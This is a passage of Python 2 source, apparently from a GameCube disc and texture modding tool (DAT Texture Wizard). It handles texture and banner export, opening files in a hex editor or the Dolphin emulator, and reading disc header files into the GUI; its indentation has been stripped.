# Make sure there are textures selected to export, and a file loaded to export from
if not iidSelectionsTuple or not globalDatFile:
msg( 'No texture is selected.' )
return
# Get and validate the export format to be used.
exportFormat = settings.get( 'General Settings', 'textureExportFormat' ).lower().replace( '.', '' )
if exportFormat != 'png' and exportFormat != 'tpl':
msg( 'The default export format setting (textureExportFormat) is invalid! The format must be PNG or TPL.' )
return
directoryPath = ''
textureFilename = ''
problemFiles = []
workingFile = 1
if len( iidSelectionsTuple ) == 1:
defaultFilename = constructTextureFilename( globalDatFile, iidSelectionsTuple[0] )
if exportFormat == 'png': filetypes = [('PNG files', '*.png'), ('TPL files', '*.tpl'), ("All files", "*.*")]
else: filetypes = [('TPL files', '*.tpl'), ('PNG files', '*.png'), ("All files", "*.*")]
validExt = False
while not validExt:
# Prompt for a filename, and a place to save the file.
savePath = tkFileDialog.asksaveasfilename(
title="Where would you like to export the file?",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
initialfile=defaultFilename,
defaultextension='.' + exportFormat,
filetypes=filetypes)
# Check the extension to see if it's valid (or just exit the loop if cancel was pressed).
exportFormat = savePath[-3:].lower()
if exportFormat == 'png' or exportFormat == 'tpl' or savePath == '': validExt = True
else: msg( 'Textures may only be exported in PNG or TPL format.' )
# If a path was given, get the directory chosen for the file
if savePath:
directoryPath = os.path.dirname( savePath )
textureFilename = os.path.basename( savePath )
else: # Multiple textures selected for export
directoryPath = tkFileDialog.askdirectory( # Instead of having the user choose a file name and save location, have them choose just the save location.
title='Where would you like to save these textures?',
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
parent=Gui.root,
mustexist=True)
if not directoryPath: # The dialog box was canceled
return
for iid in iidSelectionsTuple:
# Set us up the GUI
Gui.programStatus.set( 'Exporting Texture ' + str(workingFile) + '....' )
Gui.programStatusLabel.update()
workingFile += 1
# Collect data/info on this texture
textureDetails = imageDataOffset, imageDataLength, width, height, imageType = parseTextureDetails( iid )
imageData = globalDatFile.getData( imageDataOffset, imageDataLength )
# Construct a filepath/location to save the image to
if textureFilename: # May be a custom name from the user if only one texture is being exported.
savePath = directoryPath + '/' + textureFilename
else:
savePath = directoryPath + '/' + constructTextureFilename( globalDatFile, iid, textureDetails=textureDetails ) + '.' + exportFormat
# Collect the palette data, if needed
if imageType == 8 or imageType == 9 or imageType == 10:
paletteData, paletteType = getPaletteData( globalDatFile, imageDataOffset, imageData=imageData, imageType=imageType )
if not paletteData:
msg( 'A color palette could not be found for the texture at offset ' + uHex(0x20+imageDataOffset) + '. This texture will be skipped.' )
continue
else:
paletteData = ''
paletteType = None
try: # Save the file to be exported
if exportFormat == 'tpl':
tplImage = tplEncoder( imageDimensions=(width, height), imageType=imageType, paletteType=paletteType )
tplImage.encodedImageData = imageData
tplImage.encodedPaletteData = paletteData
tplImage.createTplFile( savePath )
elif exportFormat == 'png': # Decode the image data
pngImage = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
pngImage.deblockify()
pngImage.createPngFile( savePath, creator='DTW - v' + programVersion )
except: problemFiles.append( os.path.basename(savePath) )
# Finished with file export/creation loop.
# Update the default directory to start in when opening or exporting files.
settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(savePath) )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
# Give an error message for any problems encountered.
if problemFiles:
msg( "There was an unknown problem while exporting these files:\n\n" + '\n'.join(problemFiles) )
updateProgramStatus( 'Export Error' )
else: updateProgramStatus( 'Export Successful' )
def exportBanner( event ):
if not globalBannerFile or not globalBannerFile.data:
msg( 'No banner file or disc appears to be loaded.', 'Cannot Export Banner Image' )
return
defaultFilename = globalBannerFile.fileName + '_0x20_5'
# Prompt for a place to save the file
validExt = False
while not validExt:
# Prompt for a filename, and a place to save the file.
savePath = tkFileDialog.asksaveasfilename(
title="Where would you like to export the file?",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
initialfile=defaultFilename,
defaultextension='.png',
filetypes=[('PNG files', '*.png'), ('TPL files', '*.tpl'), ("All files", "*.*")])
# Check the extension to see if it's valid (or just exit the loop if cancel was pressed).
fileType = savePath[-3:].lower()
if fileType == 'png' or fileType == 'tpl' or savePath == '': validExt = True
else: msg( 'The banner may only be exported in PNG or TPL format.' )
if not savePath:
return # No actions beyond this point if no path was chosen above (i.e. the dialog box was canceled)
# Collect more info on the texture and then create a file out of it.
imageData = hexlify( globalBannerFile.data[0x20:0x1820] )
try: # do da ting.
success = True
if fileType == 'tpl':
tplImage = tplEncoder( imageDimensions=(96, 32), imageType=5 )
tplImage.encodedImageData = imageData
tplImage.encodedPaletteData = ''
tplImage.createTplFile( savePath )
else: # png
pngImage = tplDecoder( imageDimensions=(96, 32), imageType=5, encodedImageData=imageData )
pngImage.deblockify()
pngImage.createPngFile( savePath, creator='DTW - v' + programVersion )
except: success = False
# Update the default directory to start in when opening or exporting files.
settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(savePath) )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
# Give an error message for any problems encountered.
if not success:
msg( "There was an unknown problem while exporting the banner." )
updateProgramStatus( 'Export Error' )
else: updateProgramStatus( 'Export Successful' )
def noDiscChangesToBeSaved(): # Asks the user if they would like to forget any unsaved disc changes in order to close the program or load a new file.
# Check that there aren't any unsaved changes with the currently selected ISO (if there is one).
global unsavedDiscChanges
youShallPass = True
if unsavedDiscChanges != []:
if programClosing: warning = "The changes below haven't been saved to disc. Are you sure you \nwant to close?\n\n" + '\n'.join( unsavedDiscChanges )
else: warning = 'The changes below will be forgotten if you change or reload the disc before saving. Are you sure you want to do this?\n\n' + '\n'.join( unsavedDiscChanges )
youShallPass = tkMessageBox.askyesno( 'Unsaved Changes', warning )
if youShallPass:
unsavedDiscChanges = [] # Forgets the past changes.
#restoreEditedEntries()
return youShallPass
def getHexEditorPath():
# Check/ask for a specified hex editor to open files in.
if not os.path.exists( settings.get( 'General Settings', 'hexEditorPath' ) ):
popupWindow = PopupEntryWindow( Gui.root, message='Please specify the full path to your hex editor. '
'(Specifying this path only needs to\nbe done once, and can be changed at any time in the settings.ini file.\nIf you have already set this, '
"the path seems to have broken.)\n\nNote that this feature only shows you a copy of the data;\nany changes made will not be saved to the file or disc."
'\n\nPro-tip: In Windows, if you hold Shift while right-clicking on a file, there appears a context menu \n'
"""option called "Copy as path". This will copy the file's full path into your clipboard. Or if it's\na shortcut, """
"""you can quickly get the full file path by right-clicking on the icon and going to Properties.""", title='Set hex editor path' )
hexEditorPath = popupWindow.entryText.replace( '"', '' )
if hexEditorPath != '':
# Update the path in the settings file and global variable.
settings.set( 'General Settings', 'hexEditorPath', hexEditorPath )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile ) # Updates a pre-existing settings file entry, or just creates a new file.
else: hexEditorPath = settings.get( 'General Settings', 'hexEditorPath' )
return hexEditorPath
def viewFileHexFromFileTree():
""" Gets and displays hex data for a file within a disc in the user's hex editor of choice.
Used by the ISO File Tree's context menu. """
if not discDetected(): return
iidSelectionsTuple = Gui.isoFileTree.selection()
if iidSelectionsTuple == '':
msg( 'No file is selected.' )
return
elif len( iidSelectionsTuple ) > 1:
msg( 'Please choose only one file for this operation.' )
return
entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( iidSelectionsTuple[0], 'values' )[1:] # Excluding description
if len( iidSelectionsTuple ) == 1 and entity == 'file': # Ensures there's only one selection and it's not a folder.
hexEditorPath = getHexEditorPath()
if not hexEditorPath: return
# Create a temporary file if this is not an external file already.
if source == 'iso':
# Open the disc image and retrieve the binary for the target file.
with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
isoBinary.seek( int(isoOffset, 16) )
datData = bytearray( isoBinary.read( int(fileSize) ) ) #todo: test if this conversion is even needed
elif source == 'path': # In this case, "data" is a filepath to an external file
with open( data, 'rb') as origFile:
datData = bytearray( origFile.read() )
else: datData = bytearray.fromhex( data ) # source == 'ram'
# Create a file name with folder names included, so that multiple files of the same name (but from different folders) can be opened.
#fileName = '-'.join( isoPath.split('/')[1:] )
fileName = isoPath.replace( '/', '-' )
saveAndShowTempDatData( hexEditorPath, datData, fileName )
else: msg( 'You must select a file for this operation (not a folder).' )
def viewDatFileHex():
""" Gets and displays hex data of a loaded DAT file in the user's hex editor of choice.
Used by the Structural Analysis tab. """
if not globalDatFile:
msg( 'No DAT file has been loaded.' )
return
hexEditorPath = getHexEditorPath()
if not hexEditorPath: return
saveAndShowTempDatData( hexEditorPath, globalDatFile.getFullData(), globalDatFile.fileName )
def saveAndShowTempDatData( hexEditorPath, datData, fileName ):
# Save the file data to a temporary file.
try:
tempFilePath = scriptHomeFolder + '\\bin\\tempFiles\\' + fileName
createFolders( os.path.split(tempFilePath)[0] )
with open( tempFilePath, 'wb' ) as newFile:
newFile.write( datData )
except: # Pretty unlikely
print 'Error creating temporary file for saveAndShowTempDatData()!'
return
# Open the temp file in the user's editor of choice.
if os.path.exists( hexEditorPath ) and os.path.exists( tempFilePath ):
command = '"' + hexEditorPath + '" "' + tempFilePath + '"'
subprocess.Popen( command, stderr=subprocess.STDOUT, creationflags=0x08000000 )
else: msg( "Unable to find the specified hex editor program (or new temporary file). You may want to double check the path saved in DTW's settings.ini file." )
def runInEmulator():
# Check/ask for a specified program to open the file in.
if not os.path.exists( settings.get( 'General Settings', 'emulatorPath' ) ):
popupWindow = PopupEntryWindow( Gui.root, message='Please specify the full path to your emulator. '
'(Specifying this path only needs to\nbe done once, and can be changed at any time in the settings.ini file.'
'\nIf you have already set this, the path seems to have broken.)'
'\n\nPro-tip: In Windows, if you hold Shift while right-clicking on a file, there appears a context \nmenu '
"""option called "Copy as path". This will copy the file's full path into your clipboard. Or if it's a\nshortcut, """
"""you can quickly get the full file path by right-clicking on the icon and going to Properties.""", title='Set Emulator Path' )
emulatorPath = popupWindow.entryText.replace( '"', '' )
if emulatorPath != '':
# Update the path in the settings file and global variable.
settings.set( 'General Settings', 'emulatorPath', emulatorPath )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile ) # Updates a pre-existing settings file entry, or just creates a new file.
else:
emulatorPath = settings.get( 'General Settings', 'emulatorPath' )
if emulatorPath:
# Check that there's a disc loaded, and that the emulator and disc have valid paths
if not discDetected(): return
elif not os.path.exists( emulatorPath ):
msg( "Unable to find the Dolphin executable. You may want to double check the path saved in DTW's settings.ini file." )
else:
# Send the disc filepath to Dolphin
# Must use '--exec'. Because '/e' is incompatible with Dolphin 5+, while '-e' is incompatible with Dolphin 4.x
# '--batch' will prevent dolphin from unnecessarily scanning game/ISO directories, and will shut down Dolphin when the game is stopped.
command = '"{}" --batch --exec="{}"'.format( emulatorPath, globalDiscDetails['isoFilePath'] )
process = subprocess.Popen( command, shell=True, stderr=subprocess.STDOUT, creationflags=0x08000000 ) # shell=True gives access to all shell features.
#=================================#
# ~ ~ Primary Disc Operations ~ ~ #
#=================================#
def initializeDiscFileTree( refreshGui ):
""" Called when first loading a disc or root folder, to clear/update the GUI. """
global unsavedDiscChanges
unsavedDiscChanges = []
Gui.isoFileTreeBg.place_forget() # Removes the background image if present
# Delete the current items in the tree
for item in Gui.isoFileTree.get_children(): Gui.isoFileTree.delete( item )
# If desired, temporarily show the user that all items have been removed (Nice small indication that the iso is actually updating)
if refreshGui: Gui.root.update()
# Disable buttons in the iso operations panel. They're re-enabled later if all goes well
for widget in Gui.isoOpsPanelButtons.winfo_children():
#if widget.winfo_class() == 'TButton':
widget.config( state='disabled' ) # Will stay disabled if there are problems loading a disc.
# Set the GUI's other values back to default.
Gui.isoOffsetText.set( 'Disc Offset: ' )
Gui.internalFileSizeText.set( 'File Size: ' )
Gui.internalFileSizeLabelSecondLine.set( '' )
def getDiscSystemFileInfo( isoPath, apploaderPath='' ):
""" Collects basic info on system files in the disc, including file location/size for the DOL/FST, and the FST's data.
If apploaderPath is provided, it means a root folder is being scanned, and isoPath will instead be a file path
to a boot.bin or iso.hdr file. """
# Read basic stats from the ISO directly.
with open( isoPath, 'rb') as isoBinary:
gameId = isoBinary.read(6).decode( 'utf-8' )
globalDiscDetails['gameId'] = gameId
# Get info on the DOL and the game's FST/TOC (File System Table/Table of Contents).
isoBinary.seek( 0x420 )
dolOffset = toInt( isoBinary.read(4) )
fstOffset = toInt( isoBinary.read(4) )
dolSize = fstOffset - dolOffset
fstSize = toInt( isoBinary.read(4) )
#maxFstSize = toInt( isoBinary.read(4) )
# Get components to calculate the apploader size
if apploaderPath == '': # Scanning a disc file (ISO/GCM)
isoBinary.seek( 0x2454 )
codeSize = toInt( isoBinary.read(4) )
trailerSize = toInt( isoBinary.read(4) )
# Get the FST data
isoBinary.seek( fstOffset )
fstData = isoBinary.read( fstSize ).encode( 'hex' )
else:
with open( apploaderPath, 'rb' ) as apploaderBinary:
apploaderBinary.seek( 0x14 )
codeSize = toInt( apploaderBinary.read(4) )
trailerSize = toInt( apploaderBinary.read(4) )
fstData = ''
# Calculate the apploader's size
apploaderSize = roundTo32( codeSize + trailerSize )
return gameId, dolOffset, fstOffset, dolSize, fstSize, fstData, apploaderSize
def getFileDataFromDiscTree( iid='', iidValues=() ): # Returns the file data in hex-string form.
if iid:
if Gui.isoFileTree.exists( iid ):
_, entity, isoOffset, fileSize, _, source, data = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
else: return None
elif iidValues: entity, isoOffset, fileSize, source, data = iidValues
else: return None # raise IOError( 'An iid or a set of iidValues must be provided to getFileDataFromDiscTree' )
# Enough info is available; pull the file.
if entity == 'file':
if source == 'iso':
if os.path.exists( globalDiscDetails['isoFilePath'] ):
# Open the disc image and retrieve the binary for the target file.
with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
isoBinary.seek( int(isoOffset, 16) )
fileHex = isoBinary.read( int(fileSize) ).encode('hex')
else: return None #msg( 'The disc that this file resided in can no longer be found (it may have been moved/renamed/deleted).' )
elif source == 'ram':
fileHex = data
else: # source == 'path', meaning data is a filepath to an external file
if os.path.exists( data ):
with open( data, 'rb') as externalFile:
fileHex = externalFile.read().encode( 'hex' )
else: return None #msg( 'The externally referenced file at "' + data + '" can no longer be found (it may have been moved/renamed/deleted).' )
return fileHex
else: return None
def getFileDataFromDiscTreeAsBytes( iid='', iidValues=() ): # Returns the file data in bytearray form (should migrate all data manipulations to this methodology).
if iid:
if Gui.isoFileTree.exists( iid ):
_, entity, isoOffset, fileSize, _, source, data = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
else:
print 'getFileDataFromDiscTreeAsBytes(): Could not find the given iid, {}, in the treeview.'.format( iid )
return None
elif iidValues: entity, isoOffset, fileSize, source, data = iidValues
else: return None # raise IOError( 'An iid or a set of iidValues must be provided to getFileDataFromDiscTree' )
if entity != 'file': return None
# Enough info is available; pull the file.
if source == 'iso':
if os.path.exists( globalDiscDetails['isoFilePath'] ):
# Open the disc image and retrieve the binary for the target file.
with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
isoBinary.seek( int(isoOffset, 16) )
byteData = bytearray( isoBinary.read( int(fileSize) ) )
else:
print 'getFileDataFromDiscTreeAsBytes(): Disc could not be found.'
return None #msg( 'The disc that this file resided in can no longer be found (it may have been moved/renamed/deleted).' )
elif source == 'ram':
byteData = bytearray.fromhex( data ) # Exists as a hex string
else: # source == 'path', meaning data is a filepath to an external file
if os.path.exists( data ):
with open( data, 'rb') as externalFile:
byteData = bytearray( externalFile.read() )
else: return None #msg( 'The externally referenced file at "' + data + '" can no longer be found (it may have been moved/renamed/deleted).' )
return byteData
def getFileSizeFromDiscTree( iid ): # Returns an int for the file size, in bytes
assert Gui.isoFileTree.exists( iid ), 'Nonexistant file requested for getFileSizeFromDiscTree'
_, entity, _, fileSize, _, source, data = Gui.isoFileTree.item( iid, 'values' )
if entity == 'file':
if source == 'iso':
return int( fileSize )
elif source == 'ram':
return len( data )/2
else: # source == 'path', meaning data is a filepath to an external file
if not os.path.exists( data ): # Failsafe
msg( 'The externally referenced file at "' + data + '" can no longer be found (it may have been moved/renamed/deleted).' )
return 0
return int( os.path.getsize( data ) )
else:
return 0
def updateBannerFileInfo( updateTextEntries=True, imageName='' ):
global updatingBannerFileInfo, stopAndReloadBannerFileInfo
# Prevent conflicts with an instance of this function that may already be running (let that instance finish its current iteration and call this function again)
if updatingBannerFileInfo:
stopAndReloadBannerFileInfo = True
return
updatingBannerFileInfo = True
if updateTextEntries:
# Delete existing content in the GUI
Gui.gameName1Field['state'] = 'normal' # Must be enabled before can edit, even programmatically
Gui.gameName1Field.delete( '1.0', 'end' )
Gui.shortTitle.set( '' )
Gui.shortMaker.set( '' )
Gui.longTitle.set( '' )
Gui.longMaker.set( '' )
Gui.gameDescField.delete( '1.0', 'end' )
# Determine if an animation will be used, and where, by checking if it would be visible to the user
currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
if currentlySelectedTab == Gui.discTab: canvasToAnimate = Gui.bannerCanvas
elif currentlySelectedTab == Gui.discDetailsTab: canvasToAnimate = Gui.bannerCanvas2
else: canvasToAnimate = None
if canvasToAnimate and canvasToAnimate.bannerGCstorage: # An existing banner image is currently visible
# Remove the banner on the opposite disc tab
if currentlySelectedTab == Gui.discTab: Gui.bannerCanvas2.delete('all')
elif currentlySelectedTab == Gui.discDetailsTab: Gui.bannerCanvas.delete('all')
# Remove the banner on the current disc tab using a vertical fade
width, height = canvasToAnimate.pilImage.size
pixels = canvasToAnimate.pilImage.load()
bandHeight = 30
for y in xrange( height + bandHeight ):
if stopAndReloadBannerFileInfo:
updatingBannerFileInfo = False
stopAndReloadBannerFileInfo = False
updateBannerFileInfo( updateTextEntries, imageName )
return
for bandSegment in xrange( bandHeight ): # This will modify the current row, and then prior rows (up to the bandHeight)
targetRow = y - bandSegment
if targetRow >= 0 and targetRow < height:
for x in xrange( width ):
initialAlpha = pixels[x, targetRow][3]
newAlpha = int( initialAlpha - ( float(bandSegment)/bandHeight * initialAlpha ) )
#if x == 0: print 'row', targetRow, ':', initialAlpha, 'to', newAlpha
pixels[x, targetRow] = pixels[x, targetRow][:3] + (newAlpha,)
canvasToAnimate.bannerGCstorage = ImageTk.PhotoImage( canvasToAnimate.pilImage )
canvasToAnimate.itemconfig( canvasToAnimate.canvasImageItem, image=canvasToAnimate.bannerGCstorage )
canvasToAnimate.update() # update_idletasks
time.sleep( .0005 ) # 500 us
canvasToAnimate.delete('all')
time.sleep( .4 )
else: # No banner currently visible. Clear the canvases
Gui.bannerCanvas.delete('all')
Gui.bannerCanvas2.delete('all')
# Make sure there's banner file data
if not globalBannerFile.data:
# Delete the remainder of the content in the GUI and return
Gui.bannerCanvas.pilImage = None
Gui.bannerCanvas.bannerGCstorage = None
Gui.bannerCanvas.canvasImageItem = None
Gui.bannerCanvas2.pilImage = None
Gui.bannerCanvas2.bannerGCstorage = None
Gui.bannerCanvas2.canvasImageItem = None
updatingBannerFileInfo = False
return
if updateTextEntries:
if Gui.countryCode.get() == 'us': encoding = 'latin_1' # Decode assuming English or other European countries
else: encoding = 'shift_jis' # The country code is 'jp', for Japanese.
# Get the raw hex from the file and decode it, splitting on the first stop byte
Gui.shortTitle.set( globalBannerFile.data[0x1820:(0x1820 + 0x20)].split('\x00')[0].decode(encoding) )
Gui.shortMaker.set( globalBannerFile.data[0x1840:(0x1840 + 0x20)].split('\x00')[0].decode(encoding) )
Gui.longTitle.set( globalBannerFile.data[0x1860:(0x1860 + 0x40)].split('\x00')[0].decode(encoding) )
Gui.longMaker.set( globalBannerFile.data[0x18a0:(0x18a0 + 0x40)].split('\x00')[0].decode(encoding) ) # Can be a name or description
Gui.gameDescField.insert( '1.0', globalBannerFile.data[0x18e0:(0x18e0 + 0x80)].split('\x00')[0].decode( encoding ) )
if globalBannerFile.source == 'disc':
Gui.gameIdTextEntry.enableEntry()
# Update the gameName1Field
# Doing this here rather than prior functions for aesthetics; here, the text will populate at the same time as the other text.
Gui.gameName1Field.insert( '1.0', imageName )
else:
Gui.gameIdTextEntry.disableEntry()
# Update the gameName1Field
Gui.gameName1Field.insert( '1.0', "\t\t[ This isn't located in the banner file. \n\t\t Open your disc to edit this entry. ]" )
Gui.gameName1Field['state'] = 'disabled' # Must be disabled only after editing
# Read and decode the banner image data
bannerImage = tplDecoder( imageDimensions=(96, 32), imageType=5, encodedImageData=globalBannerFile.data[0x20:0x1820] )
bannerImage.deblockify() # This decodes the image data, to create an rgbaPixelArray.
Gui.bannerCanvas.pilImage = Image.new( 'RGBA', (96, 32) )
Gui.bannerCanvas.pilImage.putdata( bannerImage.rgbaPixelArray )
Gui.bannerCanvas.bannerGCstorage = ImageTk.PhotoImage( Gui.bannerCanvas.pilImage ) # To prevent garbage collection from deleting the image (including after image modification/replacement)
Gui.bannerCanvas2.pilImage = Gui.bannerCanvas.pilImage
Gui.bannerCanvas2.bannerGCstorage = Gui.bannerCanvas.bannerGCstorage
if canvasToAnimate:
# Add the banner on the opposite disc tab (instantly; no animation)
if currentlySelectedTab == Gui.discTab:
Gui.bannerCanvas2.canvasImageItem = Gui.bannerCanvas2.create_image( 0, 0, image=Gui.bannerCanvas2.bannerGCstorage, anchor='nw' )
elif currentlySelectedTab == Gui.discDetailsTab:
Gui.bannerCanvas.canvasImageItem = Gui.bannerCanvas.create_image( 0, 0, image=Gui.bannerCanvas.bannerGCstorage, anchor='nw' )
# Add the banner on the current tab using a dissolve fade.
# First, create a blank image on the canvas
dissolvingImage = Image.new( 'RGBA', (96, 32), (0,0,0,0) )
canvasToAnimate.canvasImageItem = canvasToAnimate.create_image( 0, 0, image=ImageTk.PhotoImage(dissolvingImage), anchor='nw' )
dessolvingPixels = dissolvingImage.load()
width, height = 96, 32
# Display the converted image
bannerPixels = canvasToAnimate.pilImage.load()
pixelsToUpdatePerPass = 172
pixelsNotShown = [ (x, y) for x in range(width) for y in range(height) ] # Creates a list of all possible pixel coordinates for the banner image
while pixelsNotShown:
if stopAndReloadBannerFileInfo:
updatingBannerFileInfo = False
stopAndReloadBannerFileInfo = False
updateBannerFileInfo( updateTextEntries, imageName )
return
# Randomly pick out some pixels to show
pixelsToShow = []
while len( pixelsToShow ) < pixelsToUpdatePerPass and pixelsNotShown:
randomIndex = random.randint( 0, len(pixelsNotShown) - 1 )
pixelsToShow.append( pixelsNotShown[randomIndex] )
del pixelsNotShown[randomIndex]
if pixelsToUpdatePerPass > 2: pixelsToUpdatePerPass -= math.sqrt( pixelsToUpdatePerPass )/2
# Update the chosen pixels
for pixelCoords in pixelsToShow: dessolvingPixels[pixelCoords] = bannerPixels[pixelCoords]
# Update the GUI
canvasToAnimate.bannerGCstorage = ImageTk.PhotoImage( dissolvingImage )
canvasToAnimate.itemconfig( canvasToAnimate.canvasImageItem, image=canvasToAnimate.bannerGCstorage )
canvasToAnimate.update()
time.sleep( .022 )
canvasToAnimate.canvasImageItem = canvasToAnimate.create_image( 0, 0, image=canvasToAnimate.bannerGCstorage, anchor='nw' )
else: # No animation; just add the banner to the GUI
Gui.bannerCanvas.canvasImageItem = Gui.bannerCanvas.create_image( 0, 0, image=Gui.bannerCanvas.bannerGCstorage, anchor='nw' )
Gui.bannerCanvas2.canvasImageItem = Gui.bannerCanvas2.create_image( 0, 0, image=Gui.bannerCanvas2.bannerGCstorage, anchor='nw' )
updatingBannerFileInfo = False
def reloadBanner():
""" This is solely used by the radio buttons for file encoding on the Disc Details Tab;
selecting one of those encodings should reload the banner file with that encoding. """
# Cancel if no banner file appears to be loaded
if not globalBannerFile or not globalBannerFile.data: return
# Get the gameName1Field text, which won't be changed
discImageName = Gui.gameName1Field.get( '1.0', 'end' )[:-1] # ignores trailing line break (which the get() method seems to add)
updateBannerFileInfo( imageName=discImageName )
def populateDiscDetails( discSize=0 ):
""" This primarily updates the Disc Details Tab using information from boot.bin/ISO.hdr; it directly handles
updating the fields for disc filepath, gameID (and its breakdown), region and version, image name,
20XX version (if applicable), and disc file size.
The disc's country code is also found, which is used to determine the encoding of the banner file.
A call to update the banner image and other disc details is also made in this function.
This function also updates the disc filepath on the Disc File Tree tab (and the hover/tooltip text for it). """
missingFiles = []
# Update the filepath field in the GUI, and create a shorthand string that will fit nicely on the Disc File Tree tab
Gui.isoDestination.set( globalDiscDetails['isoFilePath'] )
frameWidth = Gui.isoOverviewFrame.winfo_width()
accumulatingName = ''
for character in reversed( globalDiscDetails['isoFilePath'] ):
accumulatingName = character + accumulatingName
Gui.isoPathShorthand.set( accumulatingName )
if Gui.isoPathShorthandLabel.winfo_reqwidth() > frameWidth:
# Reduce the path to the closest folder (that fits in the given space)
normalizedPath = os.path.normpath( accumulatingName[1:] )
if '\\' in normalizedPath: Gui.isoPathShorthand.set( '\\' + '\\'.join( normalizedPath.split('\\')[1:] ) )
else: Gui.isoPathShorthand.set( '...' + normalizedPath[3:] ) # Filename is too long to fit; show as much as possible
break
ToolTip( Gui.isoPathShorthandLabel, globalDiscDetails['isoFilePath'], delay=500, wraplength=400, follow_mouse=1 )
# Look up info within boot.bin (gameID, disc version, and disc region)
bootBinData = getFileDataFromDiscTreeAsBytes( iid=scanDiscForFile('boot.bin') )
if not bootBinData:
missingFiles.append( 'boot.bin or ISO.hdr' )
Gui.gameIdText.set( '' )
Gui.isoVersionText.set( '' )
imageName = ''
else:
gameId = bootBinData[:6].decode( 'ascii' ) # First 6 bytes
Gui.gameIdText.set( gameId )
versionHex = hexlify( bootBinData[7:8] ) # Byte 7
ntscRegions = ( 'A', 'E', 'J', 'K', 'R', 'W' )
if gameId[3] in ntscRegions: Gui.isoVersionText.set( 'NTSC 1.' + versionHex )
else: Gui.isoVersionText.set( 'PAL 1.' + versionHex )
imageName = bootBinData[0x20:0x20 + 0x3e0].split('\x00')[0].decode( 'ascii' ) # Splitting on the first stop byte
# Get Bi2.bin and check the country code (used to determine encoding for the banner file)
bi2Iid = scanDiscForFile( 'bi2.bin' ) # This will try for 'iso.hdr' if bi2 doesn't exist
bi2Data = getFileDataFromDiscTreeAsBytes( iid=bi2Iid )
if not bi2Data:
missingFiles.append( 'bi2.bin or ISO.hdr' )
else:
# Depending on which file is used, get the location/offset of where the country code is in the file
if bi2Iid.endswith( 'iso.hdr' ): countryCodeOffset = 0x458 # (0x440 + 0x18)
else: countryCodeOffset = 0x18
# Set the country code
if toInt( bi2Data[countryCodeOffset:countryCodeOffset+4] ) == 1: Gui.countryCode.set( 'us' )
else: Gui.countryCode.set( 'jp' )
# Remove the existing 20XX version label (the label displayed next to the StringVar, not the StringVar itself), if it's present.
for widget in Gui.discDetailsTab.row2.winfo_children():
thisWidgets = widget.grid_info()
if thisWidgets['row'] == '1' and ( thisWidgets['column'] == '8' or thisWidgets['column'] == '9' ):
widget.destroy()
# Update the 20XX version label
if globalDiscDetails['is20XX']:
twentyxxLabel = ttk.Label( Gui.discDetailsTab.row2, text='20XX Version:' )
twentyxxLabel.grid( column=8, row=1, sticky='e', padx=Gui.discDetailsTab.row2.padx )
twentyxxLabel.bind( '<Enter>', lambda event: setDiscDetailsHelpText('20XX Version') )
twentyxxLabel.bind( '<Leave>', setDiscDetailsHelpText )
twentyxxVersionLabel = ttk.Label( Gui.discDetailsTab.row2, text=globalDiscDetails['is20XX'] )
twentyxxVersionLabel.grid( column=9, row=1, sticky='w', padx=Gui.discDetailsTab.row2.padx )
twentyxxVersionLabel.bind( '<Enter>', lambda event: setDiscDetailsHelpText('20XX Version') )
twentyxxVersionLabel.bind( '<Leave>', setDiscDetailsHelpText )
# Load the banner and other info contained within the banner file
bannerIid = scanDiscForFile( 'opening.bnr' )
if not bannerIid:
missingFiles.append( 'opening.bnr' )
else:
global globalBannerFile
globalBannerFile = hsdFiles.datFileObj( source='disc' )
fileName = os.path.basename( Gui.isoFileTree.item( bannerIid, 'values' )[4] ) # Using isoPath (will probably be all lowercase anyway)
globalBannerFile.load( bannerIid, fileData=getFileDataFromDiscTreeAsBytes( iid=bannerIid ), fileName=fileName )
updateBannerFileInfo( imageName=imageName )
# Get and display the disc's total file size
if discSize: # If this was provided, it's a root folder that's been opened (and this value is a predicted one)
isoByteSize = discSize
else: isoByteSize = os.path.getsize( globalDiscDetails['isoFilePath'] )
isoSize = "{:,}".format( isoByteSize )
Gui.isoFilesizeText.set( isoSize + ' bytes' )
Gui.isoFilesizeTextLine2.set( '(i.e.: ' + "{:,}".format(isoByteSize/1048576) + ' MB, or ' + humansize(isoByteSize) + ')' )
# Alert the user of any problems detected
if missingFiles: msg( 'Some details of the disc could not be determined, because the following files could not be found:\n\n' + '\n'.join(missingFiles) )
def get20xxRandomNeutralNameOffset( fullFileName ):
""" Recognizes stages within the set of 'Random Neutrals' (The sets of 16 stages for each legal neutral stage),
and then returns the MnSlChr file offset of the stage name table for the stage in question, as well as the
base stage name (e.g. a string of "Dream Land (N64)"). Returns -1 if the stage is not among the random neutrals. """
nameOffset = -1
baseStageName = ''
fileName, fileExt = os.path.splitext( fullFileName )
fileExt = fileExt.lower()
# Convert the 20XX game version to a float
try:
normalizedVersion = float( ''.join([char for char in globalDiscDetails['is20XX'] if char.isdigit() or char == '.']) ) # removes non-numbers and typecasts it
except:
normalizedVersion = 0
if 'BETA' not in globalDiscDetails['is20XX'] and normalizedVersion >= 4.06: # This version and up use a table in MnSlChr
tableOffsets = { # Offsets for stage name pointer tables (accounts for file header)
'GrNBa': 0x3C10E0, # Battlefield
'GrNLa': 0x3C1340, # Final Destination
'GrSt': 0x3C15A0, # Yoshi's Story
'GrIz': 0x3C1800, # Fountain
'GrOp': 0x3C1A60, # Dream Land
'GrP': 0x3C1CC0 } # Stadium
# Parse the file name string for the custom stage index
